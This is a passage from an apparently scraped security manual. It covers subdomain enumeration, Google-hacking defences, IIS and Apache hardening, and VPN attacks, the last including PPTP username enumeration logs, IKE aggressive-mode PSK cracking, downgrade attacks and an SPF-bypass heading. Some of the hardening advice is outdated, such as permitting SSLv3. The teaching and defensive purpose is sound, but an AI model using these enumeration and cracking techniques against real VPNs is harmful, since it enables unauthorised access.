listed in the TLD dictionary.
SSL/TLS Protocol enumeration techniques
The following enumeration techniques are based on the SSL/TLS protocol and are:
• X.509 Certificate Parsing Sometimes the target machine can publish some HTTPS
services.
A connection is tried to the common HTTP and HTTPS service ports and is tried to
negotiate an SSL/TLS connection, if the remote server supply a X.509 certificate the host
name is taken from the issuer and subject
Common Name (CN) eld and from alternate subject extension eld.
4.2.3 Passive web enumeration techniques
The following enumeration techniques are based on third party web sites and public databases.
• Search engines
The following search engines are used:
302 | P a g e
Microsoft Bing (with and without search API): http://search.msn.com
It's suggested to use this with API key which improves the amount of results fetched and the
plugin speed.
• GPG/PGP key databases
The following public databases are used:
MIT GPG key server: http://pgp.mit.edu:11371
• DNS/WHOIS databases
Public WHOIS information database, like RIPE, or DNS snapshot database are used to passively
enumerate host name and track his history.
The following public databases are used:
DNShistory: http://dnshistory.org
Domainsdb: http://www.domainsdb.net/
Fbk.de: http://www.bfk.de/
Gigablast: http://www.gigablast.com
Netcraft: http://searhdns.netcraft.com
Robtex: http://www.robtex.com
Tomdns: http://www.tomdns.net
Web-max: http://www.web-max.ca
Usage You can use hostmap from command line interface with following:
ruby hostmap.rb OPTIONS -t TARGET
Where TARGET is the IP address of the host against you wants a host discovery and OPTIONS
is a list of hostmap's options.
303 | P a g e
Detecting Sub Domains
Using Google
304 | P a g e
Using TXDNS - dictionary
Using TXDNS – Brute Force
Securing Web Servers
According to the research made by Ponemon Institute, web hacking and web based attacks are the
most costly for companies. The research results can be seen here:
305 | P a g e
These is a techniques rely purely on HTTP traffic to attack and penetrate web servers and
application servers. This technique was formulated to demonstrate that having tight firewalls or
SSL does not really matter when it comes to web application attacks. The premise of the one-way
technique is that only valid HTTP requests are allowed in and only valid HTTP responses are
allowed out of the firewall.
Components of a generic web application system
There are four components in web application systems, namely the web client which is usually a
browser, the front-end web server, the application server and for a vast majority of applications,
the database server. The following diagram shows how these components fit together.
306 | P a g e
The web application server hosts all the application logic, which may be in the form of scripts,
objects or compiled binaries. The front-end web server acts as the application interface to the
outside world, receiving inputs from the web clients via HTML forms and HTTP, and delivering
output generated by the application in the form of HTML pages. Internally, the application
interfaces with back-end database servers to carry out transactions.
The firewall is assumed to be a tightly configured firewall, allowing nothing but incoming HTTP
requests and outgoing HTML replies.
Multi-tier architecture
In software engineering, multi-tier architecture (often referred to as n-tier architecture) is
a client–server architecture in which the presentation, the application processing, and the data
management are logically separate processes. For example, an application that
uses middleware to service data requests between a user and a database employs multi-tier
architecture. The most widespread use of multi-tier architecture is the three-tier architecture.
N-tier application architecture provides a model for developers to create a flexible and reusable
application. By breaking up an application into tiers, developers only have to modify or add a
specific layer, rather than have to rewrite the entire application over. There should be a
presentation tier, a business or data access tier, and a data tier.
The concepts of layer and tier are often used interchangeably. However, one fairly common point
of view is that there is indeed a difference, and that a layer is a logical structuring mechanism for
307 | P a g e
the elements that make up the software solution, while a tier is a physical structuring mechanism
for the system infrastructure.
This architecture ensures high security, when only the presentation tier (web server) is exposed to
the internet and communicates internally and securely with the next tier.
In order to ensure the Defense-In-Depth concept and principals are implemented, strict firewall
rules and filtering mechanisms separate the communication between each tier.
Another common concept to reduce the risk exposure factor is to use different platforms and
operating systems in each tier, so that a probable attacker won’t have a “Hack One – Hack Them
All” chances. The probability of an attacker having remote code execution exploits matching the
exact version of the different operating systems in each tier, is of a very low probability.
Securing Virtual Hosts – Preventing Detection of Virtual Hosts
There are two main techniques:
1. Enforcing the webserver to respond only to the virtual host name
308 | P a g e
2. Removing PTR records that expose subdomain names
Using Hostmap
Hostmap is to enumerate all the virtual hosts and DNS names of an
IP address, and do this in the fastest and detailed way.
To achieve this hostmap uses a lot of techniques, some never used by any other tool, combined
with development technologies to get the best performances.
Features
• DNS names and virtual host enumeration
• Multiple discovery techniques
• Results correlation, aggregation and normalization
• Multi thread and event based engine
• Platform independent: hostmap an run on GNU/Linux, Microsoft Windows, Apple OSX
and in any system where Ruby works.
Techniques
To enumerate all the alias of a target machine hostmap uses a lot of techniques
Based on protocols, exposed services, target weakness, target vulnerabilities, brute forcing
techniques, public databases and search engines that an reveal a target's alias.
The data are fetched at run time from this data sources using multi thread engine to speed up the
fetching phase. All data fetched being aggregated, normalized, correlated and the results are
Checked at run time to avoid false positives. The hostmap engine is based on the knowledge of
event; each enumeration action can get results, based on type of enumeration action and the type
of the results hostmap dynamically choose the next action to take and the next enumeration check
to launch. Hostmap uses an adaptive engine written to get much more results possible.
The techniques used by hostmap are the following.
Protecting against Google Hacking
1. Keep your sensitive data off the web!
309 | P a g e
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
2. Use meta headers at non-public pages
Valid meta robots content values:
Googlebot interprets the following robots meta tag values:
 NOINDEX - prevents the page from being included in the index.
 NOFOLLOW - prevents Googlebot from following any links on the page. (Note
that this is different from the link-level NOFOLLOW attribute, which prevents
Googlebot from following an individual link.)
 NOARCHIVE - prevents a cached copy of this page from being available in the
search results.
 NOSNIPPET - prevents a description from appearing below the page in the
search results, as well as prevents caching of the page.
 NOODP - blocks the Open Directory Project description of the page from being
used in the description that appears below the page in the search results.
 NONE - equivalent to "NOINDEX, NOFOLLOW".
<META NAME="ROBOTS" CONTENT="NONE">
3. Googledork!
• Use the techniques outlined in this paper to check your own site for
sensitive information or vulnerable files.
• Use gooscan from http://johnny.ihackstuff.com) to scan your site for bad
stuff, but first get advance express permission from Google! Without
advance express permission, Google could come after you for violating
their terms of service. The author is currently not aware of the exact
implications of such a violation. But why anger the “Goo-Gods”?!?
• Check the official googledorks website (http://johnny.ihackstuff.com) on a
regular basis to keep up on the latest tricks and techniques.
4. Consider removing your private sites from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
310 | P a g e
page from our index.”
In some cases, you may want to rome individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
5. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is certainly a
suggestion. The major search engine’s crawlers honor this file and it’s contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
Securing IIS 7/7.5 + Microsoft SQL Server 2008
IIS Dynamic IP Restrictions Module: The mod_evasive of IIS
IIS has got a module which is the exact similar of the well-known Apache module, mod_evasive.
These modules automatically detect a user’s diversion from a normal user activity
and immediately block it for a certain amount of time.
This is very useful to deny basic Denial of Service attacks and to give a hard time to someone
who is crawling/Spidering your website to find hidden pages and vulnerabilities.
It can be downloaded here: http://www.iis.net/download/dynamiciprestrictions
The installation is practically “Next Next”, Thanks to the “Web Platform Installer”
311 | P a g e
Hardening IIS SSL with IISCrypto – Disabling Weak Ciphers
The free IISCrypto tool can be downloaded at:
https://www.nartac.com/Products/IISCrypto/Default.aspx
The IIS HTTPS (SSL) Server can be hardened to support FIPS 140-2 or PCI-DSS SSL security
level in 1 single click!
312 | P a g e
Hardening IIS 7.5 on Windows 2008 Server R2 SP1
The default IIS 7.5 installation does not include the IIS-Metabase Package, which is required for
installing URLScan (current version 3.1).
The IIS-Metabase package can be installed by:
CMD /C START /w PKGMGR.EXE /l:log.etw /iu:IIS-Metabase
It turns out that in IIS 7.5, URLScan will not run “out of the box” since it was installed. It must be
configured to be at the bottom of the ISAPI Filter chain for it to operate properly:
313 | P a g e
Then can configure “%windir%system32inetsrvurlscanurlscan.ini” to report it as Apache
Redirecting all requests from HTTP to HTTPS using IIS RewriteModule is done in the following
sequence:
314 | P a g e
Disabling Caching of Pages (will be applied for any page under that website, so make sure you
are configuring the HTTPS one)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,max-age=0
Pragma: no-cache
Adding Browser Security Related HTTP Headers:
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
315 | P a g e
It looks like this:
Finally, we can test to see how it actually reacts:
telnet <server> 80
GET / HTTP/1.0
And see:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-
age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=999999999; includeSubdomains
X-Frame-Options: deny
Access-Control-Allow-Origin: http://www.xyz.com
Access-Control-Allow-Methods: POST, GET
Access-Control-Max-Age: 99999999
Server: Apache
Date: Thu, 12 May 2011 10:46:48 GMT
Connection: close
Content-Length: 155
316 | P a g e
1.1. URLScan – Free By Microsoft
http://www.iis.net/download/UrlScan
1.2. WebKnight – free Host Based Web Application Firewall
http://www.aqtronix.com/?PageID=99#Download
1.3. Dynamic IP Restrictions – Beta) Anti DOS, DDOS and Web Crawling(
http://www.iis.net/download/DynamicIPRestrictions
1.4. Advanced Logging
http://www.iis.net/download/AdvancedLogging
Securing Apache
Apache Hardening
Apache SSL Hardening:
In path: /etc/httpd/conf.d/ssl.conf
Change:
# Make sure the SSL Engine is on, especially since we need a proxy
SSLEngine on
SSLProxyEngine on
# Make sure SSL is forcefully required
SSLOptions +StrictRequire
# Only accept SSL version 3 (don’t accept SSL v2…) and TLS (which is
better)
SSLProtocol -all +SSLv3 +TLSv1
SSLProxyProtocol -all +SSLv3 +TLSv1
# Only accept high security ciphers (Don’t accept low, medium and null
ciphers)
SSLCipherSuite HIGH
# Make the SSL Seed Entropy stronger
SSLRandomSeed startup file:/dev/urandom 4096
# 1024 on a slow CPU server
# 2048 no a normal CPU server
317 | P a g e
# 4096 on a fast CPU server
SSLRandomSeed connect file:/dev/urandom 2048
# Define custom logs and change log file name to be unpredictable
CustomLog /var/log/httpd/mycompany_ssl_request_log  "%t %h
%{SSL_PROTOCOL}x %{SSL_CIPHER}x "%r" %b"
# Change the default name of the log files, to make their path unpredictable
ErrorLog /var/log/httpd/mycompany_ssl_error_log
TransferLog /var/log/httpd/mycompany_ssl_access_log
LogLevel warn
# Verify the remote SSL server’s certificate validity, on SSL Proxy
connections
SSLProxyVerify require
# Make sure there will be no Man-In-The-Middle Attacks on SSL
Renegotiations
SSLInsecureRenegotiation off
Remove:
# This slows down the server’s performance and is mostly not required
<Files ~ ".(cgi|shtml|phtml|php3?)$">
SSLOptions +StdEnvVars
</Files>
<Directory "/var/www/cgi-bin">
SSLOptions +StdEnvVars
</Directory>
Mod_Evasive – Anti-D.O.S Apache Module
# we need “apxs” to compile mod_evasive, It should be in one of the following
/usr/local/psa/admin/bin/apxs
/usr/sbin/apxs
# If it wasn’t found we can find it manually
locate apxs | grep bin
# Download mod_evasive
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
318 | P a g e
# Extract mod_evasive source files
tar xvzf mod_evasive_1.10.1.tar.gz mod_evasive/
# Compile mod_evasive
/usr/sbin/apxs -cia /usr/src/mod_evasive/mod_evasive20.c
# Check mod_evasive is configured to be loaded in the apache configuration file
grep -i evasive /etc/httpd/conf/httpd.conf
#Add the following optimized rules at the end of /etc/httpd/conf/httpd.conf:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 100
DOSSiteCount 500
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 600
</IfModule>
# Restart apache so mod_evasive will be loaded into it on process initiation
/etc/init.d/httpd restart
# Due to application interference - Disabling mod_evasive!
# Comment out the following: “Include conf/mod_evasive20.conf”
SELinux – Optional Hardening:
SELinux Apache Hardening
# Change context of “/var/www/html” to “apache_sys_content_t”
chcon -R -t httpd_sys_content_t /var/www/html
# Define all new create files with the same matching context type
semanage fcontext -a -t httpd_sys_content_t /var/www/html
# Change context of “/var/log/httpd” to “apache_log_t”
chcon -R -t httpd_log_t /var/log/httpd
# Define all new create files with the same matching context type
semanage fcontext -a -t httpd_log_t /var/log/httpd
319 | P a g e
# Enforcing SELinux Rules
echo 1 >/selinux/enforce
# Restarting Tomcat after SELinux:
cd /home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-7.0/Domino_Live/ &&
/home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-
7.0/Domino_Live/shutdown.sh && /home/dominodf/home/dominodf/DigitalFuel-
Tomcat/DigitalFuel-7.0/Domino_Live/startup.sh
SELinux for other services (Experts Only)
Enable Hardened HTTP
setsebool -P httpd_builtin_scripting 1
setsebool -P httpd_can_network_connect_db 1
setsebool -P httpd_can_network_connect 1
setsebool -P httpd_can_sendmail 1
setsebool -P httpd_can_network_relay 1
setsebool -P httpd_enable_cgi 1
setsebool -P httpd_enable_homedirs 1
setsebool -P allow_httpd_sys_script_anon_write 1
setsebool -P allow_httpd_anon_write 1
setsebool -P httpd_suexec_disable_trans 1
setsebool -P httpd_tty_comm 0
setsebool -P httpd_unified 0
setsebool -P httpd_enable_ftp_server 0
setsebool -P allow_httpd_bugzilla_script_anon_write 0
setsebool -P allow_httpd_mod_auth_pam 0
setsebool -P allow_httpd_nagios_script_anon_write 0
setsebool -P allow_httpd_prewikka_script_anon_write 0
setsebool -P allow_httpd_squid_script_anon_write 0
setsebool -P httpd_disable_trans 1
setsebool -P httpd_rotatelogs_disable_trans 1
setsebool -P httpd_ssi_exec 0
setsebool -P httpd_use_cifs 0
setsebool -P httpd_use_nfs 0
Limiting Flash, Java & JavaScript
http://flash.melameth.com/togflash.msi
320 | P a g e
321 | P a g e
322 | P a g e
Email protection & filtering
 Disable inbound spoofing
323 | P a g e
324 | P a g e
325 | P a g e
Sending Spoofed Emails – Bypassing SPF with a 8$ Domain
 Attachment filtering by content type and extension detection & matching
 Using multiple anti-virus engines
 Consider Domain Whitelisting by manual moderation
326 | P a g e
VPN Security
Identifying VPNs & Firewalls (Fingerprinting VPNS)
In the last decade, Virtual Private Networks (VPN) became the most commonly deployed
solution for users to work remotely. Providing the user a full, remote network level connection to
the company’s LAN is the extremely dangerous, since the LAN is known to be organizations
“weak stomach”. However, most organizations require some people to work from home and their
field technicians and salesmen to connect into company’s internal resources.
The alternative solution to VPN is Port Forwarding, this solution means opening direct access
from the internet to an internal system, making it accessible and attackable by anyone. For certain
internal systems, which are sometimes old or self-developed and lack the required security level
required for internet exposure. Opening access to such system is too dangerous and lacks the
flexibility of multiple people connecting to the same port and getting redirected to different
machines, for services such as Remote Desktop, where is one should to be forwarded to his own
local computer.
VPN solves these security risks where nothing is exposed to the internet except for the company’s
VPN server, which is usually integrated into the Firewall. The only risk left is hacking into the
company’s LAN by attacking the VPN server itself or guessing the credentials of an authorized
remote access VPN user.
Like any other server product, each manufacturer’s VPN server replies differently the same
request, which means it can be distinguished from other products and finally identified. The most
advanced VPN fingerprinting tool is IKE-Scan, created by http://nta-monitor.com.
IKE-Scan allows attackers to remotely identify the VPN product used by the target company,
analyzing the server’s responses to IKE (Internet Key Exchange) Protocol requests.
327 | P a g e
Offline password cracking
Once a valid password is obtained using IKE Aggressive Mode it is possible to obtain a hash
from the VPN server and use this to mount an offline attack to crack the associated passwords. As
328 | P a g e
this attack is offline, it does not show on the VPN server log or cause account lockout. It is also
extremely fast - typically several hundred thousand guesses per second:
 A six character password using letters from A-Z, which has a possible 309 million
combinations, can be cracked by brute force in 16 minutes
 A six character password using letters and numbers, with a possible 57 billion
combinations, can be cracked in two days.
VPNs are an attractive target to hackers as they carry sensitive information over an insecure
network and remote access VPNs often allow full access to the internal network, while VPN
traffic is usually invisible to IDS monitoring. With increasing security in other areas e.g. more
organizations installing firewalls, moving Internet servers onto the DMZ and automatically
patching servers, the VPN becomes a more tempting target.
Scanning for “listening on TCP port 990, finds a Brute-Force-able Check Point
Firewall VPN:
329 | P a g e
On some implementations it is reconfigured to listen on port 80:
330 | P a g e
Identifying Check Point VPN-1 Edge Portal
VPN IKE User Enumeration
Many remote access VPNs have vulnerabilities that allow valid usernames to be guessed
through a dictionary attack, because they respond differently to valid and invalid
usernames. One of the basic requirements of a username/password authentication scheme
is that an incorrect login attempt should not leak information as to whether the username
or password was incorrect, because the attacker can then deduce if the username is valid
or not. However, many VPN implementations ignore this rule.
The fact that VPN usernames are often based on people's names or email addresses
makes it relatively easy for an attacker to use a dictionary attack to recover a number of
valid usernames in a short period of time.
331 | P a g e
VPN PPTP User Enumeration
Allow remote user access through the use of the PPTP VPN service. When enabled this can
normally be detected remotely through the presence of an open TCP port (1723) and the device s
acceptance of the GRE protocol (IP protocol number 47).
The PPTP VPN service uses MS-CHAPv2 for authentication. This relies on a challenge/response
mechanism in order to successfully authenticate users. When a remote user attempts to
authenticate with the PPTP VPN service, an MS-CHAPv2 packet should be returned indicating
success or failure. Failure is indicated by the return of a code 4 MS-CHAPv2 packet. This packet
will additionally contain a value in the form E=<error_number> which indicates the type of error
that occurred. A list of common error codes is given below: -
646 ERROR_RESTRICTED_LOGON_HOURS
647 ERROR_ACCT_DISABLED
648 ERROR_PASSWD_EXPIRED
649 ERROR_NO_DIALIN_PERMISSION
691 ERROR_AUTHENTICATION_FAILURE
709 ERROR_CHANGING_PASSWORD
The vulnerability occurs as a consequence of differences in the error codes returned in the failure
packet which are dependent on whether or not the username supplied is valid. When a valid
username is given with an incorrect password the following response is returned: -
sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x444fc9b9> <accomp>]
rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <pcomp>
<accomp>]
sent [LCP ConfRej id=0x1 <pcomp>]
rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>]
sent [LCP ConfReq id=0x2 <magic 0x444fc9b9> <accomp>]
rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>]
sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>]
rcvd [LCP ConfAck id=0x2 <magic 0x444fc9b9> <accomp>]
sent [LCP EchoReq id=0x0 magic=0x444fc9b9]
rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"]
sent [CHAP Response id=0x1
<73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e12
31f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "valid_username"]
rcvd [LCP EchoRep id=0x0 magic=0xfa52b227]
rcvd [CHAP Failure id=0x1 "E=691 R=1 Try again"]
MS-CHAP authentication failed: E=691 Authentication failure
CHAP authentication failed
332 | P a g e
However, when an invalid username is supplied, the following response is received: -
sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x9689f323> <accomp>]
rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <pcomp>
<accomp>]
sent [LCP ConfRej id=0x1 <pcomp>]
rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>]
sent [LCP ConfReq id=0x2 <magic 0x9689f323> <accomp>]
rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>]
sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>]
rcvd [LCP ConfAck id=0x2 <magic 0x9689f323> <accomp>]
sent [LCP EchoReq id=0x0 magic=0x9689f323]
rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"]
sent [CHAP Response id=0x1
<73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e12
31f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "invalid_username"]
rcvd [LCP EchoRep id=0x0 magic=0x245cdcee]
rcvd [CHAP Failure id=0x1 "E=649 R=1 Try again"]
MS-CHAP authentication failed: E=649
CHAP authentication failed
VPN Clients Man-In-The-Middle Downgrade Attacks
Downgrade Attacks - IPSEC Failure
MITM attackers may impede the key material exchanged on UDP Port 500 to deceive the victims
into thinking that an IPSEC connection cannot start on the other side. That would result in the
clear text stream over the connection without being noticed if the victim host is configured in
rollback mode.
Downgrade Attacks – PPTP
During the protocol negotiation phase at the beginning of a PPTP session, MITM attackers may
force the victims to use the less secure PAP authentication, MSCHAP V1 (i.e., downgrading from
MSCHAP V2), and even no encryption at all.
333 | P a g e
Attackers can also force re-negotiation (Terminate-Ack packet in clear text), steal passwords
from existing tunnels, and repeat previous attacks.
Attackers can compel "password change" to get password hashes that can be utilized directly by a
modified SMB or PPTP client. MSCHAP V1 hashes can also be foreseen.
PPTP:
PPTP (Point-to-Point Tunneling Protocol) is a protocol for VPN implementation. Microsoft
MSCHAP-V2 or EAP-TLS is used to authenticate PPTP connections. The EAP-TLS (Extensible
Authentication Protocol-Transport Layer Security) is certificate based, and thus is a safer security
option for PPTP than MSCHAP-V2.
PPTP Brute Force
334 | P a g e
Hacking VPNs with “Aggressive Mode Enabled”
335 | P a g e
336 | P a g e
Secure VPN
In-Secure VPN
337 | P a g e
338 | P a g e
Got PSK Key (SHA1 Password Hash)
339 | P a g e
Cracked PSK Key (Full Brute Force Attack – 1 hour on Intel I7)
Downloading Checkpoint Secure Client
340 | P a g e
341 | P a g e
Attacking hosts in the internal network – remotely
Endpoint Security
 Device Control
 Application Control
 Data Loss Prevention
Penetration tests and red team exercises
 Examples
 Case Studies
Implementing identity & access management
creating backups, BCP & DRP
342 | P a g e
 Onsite storage
 offsite storage
 secured access to backups
 scheduling backups
Security Metrics
 Measuring the effectiveness of investments
 Formal it control review
 Cost-benefit perspective
 Implementation issues
 Commitment to continued improvement
Incident Reponses
 Identifying the probable risks
 defining the incident assurance factors
 Defining the contacts and personnel per incident type
 developing your security threat response plan
Creating an audit
 Defining the scope of your audit: creating asset lists and a security perimeter
 What is the security perimeter?
 Assets to consider creating a 'threats list' what threats to include?
 Common 'threats' to get you started?
 Past due diligence & predicting the future
 Examining your threat history
 checking security trends
 checking with your competition
 Prioritizing your assets & vulnerabilities
 Perform a risk calculation/ probability calculation
 calculating probability
 calculating harm
343 | P a g e
Conclusions
 Periodic and continual testing of controls
o As the security world is a very dynamic environment and new attack methods
and techniques are invented every day, the security controls must be updated
constantly
o Engine/Product physical level upgrade every few years
o Controls must be tested at least quarterly
 Future evolution of the 20 critical controls
o In the future most controls will integrate into the SIEM
o The SIEM will be the main operation center and will activate most of the
controls, according the rules defined
o All controls are going to be focus on the application layer, mostly on Web
systems
o Desktop clients will almost disappear
o Attacks will be more high level and logical, the security will focus more and
more on understanding systems and less about technical bugs and vulnerabilities
o At some point, in order to mitigate complex logical vulnerabilities, controls will
integrate “Artificial Intelligence”
o The mobile world will integrate into the classical PC and network environment
and will ultimately replace most PCs or/and Laptops
 Summary and action plan
o Information Security is a repetitive process
o Information Security Controls are the tools, they need the right setup, the right
rules and periodical maintenance
o It is not right to buy 10 different solution and store them in a box inside a closet
o Every solution has to slowly implemented and integrated, one by one
o Compliance is the best tool of an information security manager to get
management support to mitigate security issues
o Real-Time monitoring of the critical systems, with the right rules and the
personnel reacting to these events are more valuable than most security controls

More Related Content

PPTX
Splunk SignalFx Infrastructure Monitoring
PDF
Roi-based Data Collection by Alan Weber at Cimetrix
PDF
Esm scg network_6.0c
PPTX
SyAM Software Solutions Overview
PPTX
Intacct Security and Operations
PPT
Data center
PDF
E Com Security solutions hand book on Firewall security management in PCI Com...
PPT
Audit of it infrastructure
Splunk SignalFx Infrastructure Monitoring
Roi-based Data Collection by Alan Weber at Cimetrix
Esm scg network_6.0c
SyAM Software Solutions Overview
Intacct Security and Operations
Data center
E Com Security solutions hand book on Firewall security management in PCI Com...
Audit of it infrastructure

Viewers also liked (20)

PDF
Java secure development part 2
PDF
Java secure development part 3
PDF
Implementing and auditing security controls part 1
PDF
Java secure development part 1
PDF
Issa security in a virtual world
PDF
Cyber attacks 101
PDF
Ciso back to the future - network vulnerabilities
PDF
Siem &amp; log management
PDF
Darknet
PDF
Cyber crime
PDF
Totally Excellent Tips for Righteous Local SEO
PPTX
Endocarditis
PPTX
Agriculture connectée 4.0
PPTX
The Next Tsunami AI Blockchain IOT and Our Swarm Evolutionary Singularity
PDF
Beyond the Gig Economy
PDF
Recovery: Job Growth and Education Requirements Through 2020
PPTX
3 hard facts shaping higher education thinking and behavior
PDF
African Americans: College Majors and Earnings
PDF
The Online College Labor Market
PDF
Game Based Learning for Language Learners
Java secure development part 2
Java secure development part 3
Implementing and auditing security controls part 1
Java secure development part 1
Issa security in a virtual world
Cyber attacks 101
Ciso back to the future - network vulnerabilities
Siem &amp; log management
Darknet
Cyber crime
Totally Excellent Tips for Righteous Local SEO
Endocarditis
Agriculture connectée 4.0
The Next Tsunami AI Blockchain IOT and Our Swarm Evolutionary Singularity
Beyond the Gig Economy
Recovery: Job Growth and Education Requirements Through 2020
3 hard facts shaping higher education thinking and behavior
African Americans: College Majors and Earnings
The Online College Labor Market
Game Based Learning for Language Learners
Ad

Similar to Implementing and auditing security controls part 2 (20)

PPTX
OwnYIT CSAT + SIEM
PDF
SCOM 2007 & Audit Collection Services
PDF
C90 Security Service
PDF
Migrating to netcool precision for ip networks --best practices for migrating...
PDF
CIS Controls - Windows Built-In and Open Source Tools to The Rescue
PDF
6 easy ways to monitor the success of Network Management Software
PPT
Chapter09
PDF
IBM enterprise Content Management
PPTX
Manage services presentation
PDF
Managed desktop and infrastructure
PPT
Top IT Management Practices for Government Entities
PPTX
The Benefits of Having Nerds On Site Monitoring Your Technology
PPS
Net Monitor Presentation
PDF
Summit 2011 infra_esm_operations
PPTX
The Benefits of Having Nerds On Site Monitoring Your Technology
PPTX
Overview and features of NCM
PDF
Multi Layer Monitoring V1
PDF
Robust data synchronization with ibm tivoli directory integrator sg246164
PDF
Robust data synchronization with ibm tivoli directory integrator sg246164
PDF
per8e020
OwnYIT CSAT + SIEM
SCOM 2007 & Audit Collection Services
C90 Security Service
Migrating to netcool precision for ip networks --best practices for migrating...
CIS Controls - Windows Built-In and Open Source Tools to The Rescue
6 easy ways to monitor the success of Network Management Software
Chapter09
IBM enterprise Content Management
Manage services presentation
Managed desktop and infrastructure
Top IT Management Practices for Government Entities
The Benefits of Having Nerds On Site Monitoring Your Technology
Net Monitor Presentation
Summit 2011 infra_esm_operations
The Benefits of Having Nerds On Site Monitoring Your Technology
Overview and features of NCM
Multi Layer Monitoring V1
Robust data synchronization with ibm tivoli directory integrator sg246164
Robust data synchronization with ibm tivoli directory integrator sg246164
per8e020
Ad

More from Rafel Ivgi (14)

PDF
Hacker techniques, exploit and incident handling
PDF
Top 10 mistakes running a windows network
PDF
Advanced web application hacking and exploitation
PDF
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...
PDF
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA Vulnerabilities
PDF
United States O1 Visa Approval
PDF
Comptia Security+ CE Certificate
PDF
ISACA Membership
PDF
CISSP
PDF
PDF
LPIC-1
PDF
CRISC
PDF
Iso 27001 Pecb Ismsla 100193 Rafel Ivgi
PDF
Webapplicationsecurity05 2010 100601100553 Phpapp02
Hacker techniques, exploit and incident handling
Top 10 mistakes running a windows network
Advanced web application hacking and exploitation
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA Vulnerabilities
United States O1 Visa Approval
Comptia Security+ CE Certificate
ISACA Membership
CISSP
LPIC-1
CRISC
Iso 27001 Pecb Ismsla 100193 Rafel Ivgi
Webapplicationsecurity05 2010 100601100553 Phpapp02

Recently uploaded (20)

DOCX
The AUB Centre for AI in Media Proposal.docx
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Electronic commerce courselecture one. Pdf
PDF
MIND Revenue Release Quarter 2 2025 Press Release
PDF
KodekX | Application Modernization Development
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PPTX
Programs and apps: productivity, graphics, security and other tools
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PPTX
MYSQL Presentation for SQL database connectivity
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
cuic standard and advanced reporting.pdf
PDF
Spectral efficient network and resource selection model in 5G networks
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPTX
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
The AUB Centre for AI in Media Proposal.docx
Understanding_Digital_Forensics_Presentation.pptx
Electronic commerce courselecture one. Pdf
MIND Revenue Release Quarter 2 2025 Press Release
KodekX | Application Modernization Development
